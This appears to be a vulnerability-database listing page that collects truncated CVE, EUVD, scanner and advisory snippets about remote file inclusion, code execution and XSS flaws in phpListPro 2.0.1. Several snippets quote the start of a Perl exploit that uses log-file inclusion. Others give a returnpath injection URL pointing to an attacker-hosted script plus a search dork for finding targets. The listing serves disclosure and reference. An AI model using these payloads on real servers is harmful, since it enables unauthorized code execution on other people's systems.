EUVD-2006-1749

Malware in sbrugna...

EUVD-2006-2523

Malware in sbrugna...

phpListPro <= 2.01 Multiple Remote File Include Vulnerabilities

No description provided by source...

phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl Title: phpListPro = 2.0.1 Remote Command Execution Exploit URL: http://www.smartisoft.com/ Info: - arbitrary local inclusion - need magicquotesgpc=off use IO::Socket; use LWP::Simple; ripped from rgod @apache= /var/log/httpd/accesslog%00,...

phpListPro returnpath Remote File Include Vulnerabilities

The remote web server contains a PHP application that is affected by remote file include vulnerabilities. Description : The remote host is running phpListPro, a web site voting/ranking tool written in PHP. The installed version of phpListPro fails to sanitize user input to the 'returnpath'...

phpListPro returnpath Remote File Include Vulnerabilities

The remote web server is running phpListPro which is affected by remote file include vulnerabilities. SPDX-FileCopyrightText: 2008 Josh Zlatin-Amishav Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...

PhpListPro Persistent XSS Vulnerability

-=--------------------ADVISORY-------------------=- phpListPro Author: CorryL [email protected] -=-----------------------------------------------=- -=+ Application: phpListPro -=+ Version: 2.0.1 -=+ Vendor's URL: http://www.smartisoft.com/ -=+ Platform: WindowsLinuxUnix -=+ Bug type: Persistent...

Remote file inclusion

PHP remote file inclusion vulnerability in config.php in phpListPro 2.0.1 and earlier, with magicquotesgpc disabled, allows remote attackers to execute arbitrary PHP code via a URL in the Language cookie...

CVE-2006-2523

The CVE-2006-2523 entry details a PHP remote file inclusion in phpListPro 2.0.1 and earlier, caused by improper handling of the Language cookie when magic_quotes_gpc is disabled. This allows an attacker to execute arbitrary PHP code by providing a malicious URL in the Language cookie. The affecte...

phpListPro 2.0.1 - Language Remote Code Execution

phpListPro 2.0.1 - Language Remote Code Execution !/usr/bin/perl Title: phpListPro = 2.0.1 Remote Command Execution Exploit URL: http://www.smartisoft.com/ Info: - arbitrary local inclusion - need magicquotesgpc=off use IO::Socket; use LWP::Simple; ripped from rgod @apache=...

phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit

Exploit for unknown platform in category web applications ============================================================ phpListPro = 2.0.1 Language Remote Code Execution Exploit ============================================================ !/usr/bin/perl Title: phpListPro = 2.0.1 Remote Command...

phpListPro 2.0.1 - &#039;Language&#039; Remote Code Execution

!/usr/bin/perl Title: phpListPro = 2.0.1 Remote Command Execution Exploit URL: http://www.smartisoft.com/ Info: - arbitrary local inclusion - need magicquotesgpc=off use IO::Socket; use LWP::Simple; ripped from rgod @apache= "/var/log/httpd/accesslog%00", "/var/log/httpd/errorlog%00",...

phpListPro &lt;= 2.0.1 (Language) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl Title: phpListPro = 2.0.1 Remote Command Execution Exploit URL: http://www.smartisoft.com/ Info: - arbitrary local inclusion - need magicquotesgpc=off use IO::Socket; use LWP::Simple; ripped from rgod @apache= "/var/log/httpd/accesslog%00",...

PhpListPro.txt

Credits: Discovered by: SnoB - [email protected] http://www.cyber-security.org Vendor URL : SmartISoft http://smartisoft.com Dork/Search for: "PHPListPro ©2001-2006 SmartISoft" Exploit : /config.php?returnpath=http://www.example.com/yourscript.txt?&ls%20-laF...

CVE-2006-2323

Multiple PHP remote file inclusion vulnerabilities in SmartISoft phpListPro 2.01 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the returnpath parameter in 1 editsite.php, 2 addsite.php, and 3 in.php. NOTE: The config.php vector is already covered by CVE-2006-1749...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in SmartISoft phpListPro 2.01 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the returnpath parameter in 1 editsite.php, 2 addsite.php, and 3 in.php. NOTE: The config.php vector is already covered by CVE-2006-1749...

CVE-2006-2323

The connected entries clearly describe a Remote File Inclusion (RFI) vulnerability in phpListPro (SmartISoft phpListPro) affecting 2.0 and earlier, exploitable via the returnpath parameter in config.php, editsite.php, addsite.php, and in.php. The underlying issue is failure to sanitize user input...

CVE-2006-2323

Multiple PHP remote file inclusion vulnerabilities in SmartISoft phpListPro 2.01 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the returnpath parameter in 1 editsite.php, 2 addsite.php, and 3 in.php. NOTE: The config.php vector is already covered by CVE-2006-1749...

PhpListPro 2.01 Remote File Include Vulnerability

Credits: Discovered by: SnoB - [email protected] http://www.cyber-security.org Vendor URL : SmartISoft http://smartisoft.com Dork/Search for: "PHPListPro ©2001-2006 SmartISoft" Exploit : /config.php?returnpath=http://www.example.com/yourscript.txt?&ls20-laF...

[MajorSecurity] phpListPro &lt;= 2.01 - Multiple Remote File Include Vulnerability

MajorSecurity phpListPro = 2.01 - Multiple Remote File Include Vulnerability -------------------------------------------------------- Software: phpListPro Version: =2.01 Type: Multiple Remote File Include Vulnerability Date: May, 8th 2006 Vendor: SmartISoft Page: http://smartisoft.com Risc: High...